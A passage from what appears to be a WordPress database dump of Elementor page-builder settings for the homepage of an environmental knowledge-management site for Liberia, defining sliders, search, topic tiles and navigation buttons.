Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/document-library\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(35308,5174,'_elementor_version','3.4.3'),(35309,5174,'_elementor_template_type','wp-page'),(35310,5174,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(35312,5174,'_elementor_pro_version','3.3.6'),(35313,5175,'_wp_page_template','default'),(35314,5175,'_elementor_edit_mode','builder'),(35315,5175,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/document-library\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(35316,5175,'_elementor_version','3.4.3'),(35317,5175,'_elementor_template_type','wp-page'),(35318,5175,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(35320,5175,'_elementor_pro_version','3.3.6'),(35321,9,'_elementor_controls_usage','a:10:{s:6:\"slides\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:2:{s:14:\"section_slides\";a:2:{s:6:\"slides\";i:1;s:13:\"slides_height\";i:1;}s:22:\"section_slider_options\";a:1:{s:17:\"content_animation\";i:1;}}}}s:6:\"column\";a:3:{s: